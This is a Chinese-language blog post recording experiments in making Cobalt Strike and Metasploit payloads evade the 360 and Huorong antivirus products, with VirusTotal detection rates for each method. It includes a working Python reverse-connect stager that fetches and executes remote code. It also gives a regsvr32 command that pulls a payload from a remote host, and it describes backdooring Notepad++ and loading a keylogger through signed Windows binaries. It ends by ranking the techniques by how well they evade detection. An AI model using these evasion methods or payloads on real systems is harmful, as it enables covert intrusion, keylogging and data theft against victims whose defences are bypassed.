打赏

尝试免杀

尝试免杀

  1. 使用the-backdoor-factory 将payload 注入到正常软件,火绒未报出是恶意软件 但是360 还是会报出
  2. 尝试evil 免杀框架 需要按照pyinstall 效果也不是很好

开发

  1. 使用cobalt strike 生成payload

  2. 使用c加载payload 使用virustotal 检测发现有 26/70 的检出机率,

    • 其中360 没有检出1
  3. 使用对称加密,将payload 进行一层加密 发现 14/71 的检出机率

    • 360也没有检出
    • 2
  4. 改成无窗口模式 11/70的检出机率

    • 3
  5. 测试生成的样本,发现在执行恶意行为时会被报出,如键盘记录以及文件读取 ,尝试修改网络流量 还是能检出

  6. 尝试使用msf的payload 进行运行, 传输后直接被检出

  7. 尝试将payload 分离 能运行一分钟,一分钟后被360报出

  8. 尝试在开源项目中添加payload

  9. 使用notepad++ 项目 在里面加入恶意payload ,发送到测试机器直接被检出

  10. 使用notepad++开源项目,未添加恶意payload 还是被检出

    • 疑是360存在大量的误报,不推荐使用360来测试 ,或者是notepad开源项目有被黑客作为靶机来使用,导致特征被加库
    • 在virustotal上查杀 检出是 13/70
    • 4
  11. 尝试使用python加载payload 按照pyinstall,生成exe,看网上资料python2基本已经是不行的,尝试python3,python3代码加载汇编在memcpy时会报错 ,换成msf框架 生成python代码,转为成exe 未被360拦截,payload源码如下,由于源码比较简单,所以未被杀毒软件报出,但是存在执行一些命令时会出cmd窗口跳出的问题

    import socket,struct,time
    for x in range(10):
         try:
              s=socket.socket(2,socket.SOCK_STREAM)
              s.connect(('192.168.1.137',8081))
              break
         except:
              time.sleep(5)
    l=struct.unpack('>I',s.recv(4))[0]
    d=s.recv(l)
    while len(d)<l:
         d+=s.recv(l-len(d))
    exec(d,{'s':s})
    
  12. msf生成js 混淆后 再使用script.exe 加载 可以过火绒 360 未测试 原理和python过免杀一致 但好像不稳定 有时不能使用

  13. 使用 带微软签名的程序 加载恶意payload 使用rundll32加载,一个自己创建的dll,然后再加载外部恶意payload文件,执行键盘记录和屏幕抓取

    • 该方案成功免杀360和火绒,
    • 但这种方式程序的主题是带签名的系统进程,内部程序也不会报出
  14. 尝试使用 regsvr32 /u /s /i:url scrobj.dll 过免杀
    - /u 反注册控件
    - /s 指定 regsvr32 安静运行,在成功注册/反注册DLL文件的前提下不显示结果提示框。
    - /n 指定不调用 DllRegisterServer。此选项必须与 /i 共同使用。
    - /i:cmdline 调用 DllInstall 将它传递到可选的 [cmdline]。在与 /u 共同使用时,它调用 dll 卸载。
    - dllname 指定要注册的 dll 文件名。
    regsvr32.exe /u /n /i:http://192.168.20.81/test.jpg scrobj.dll 刚运行就被火绒报出 尝试360 也是被报出

总结

  • 使用 python生成exe, 可以过360 和火绒,不过有时候会出现窗口,且不稳定
  • cs生成的vb宏文件可以过360,但是不能很好过火绒
  • 加密payload 再加载可以过火绒,但是不能很好过360
  • 使用rundll32 加载dll 再加载payload 可以过360+火绒,最稳定,但是执行恶意行为可能会被360其他引擎检出
posted @ 2021-02-04 14:58  skycandy  阅读(231)  评论(0编辑  收藏  举报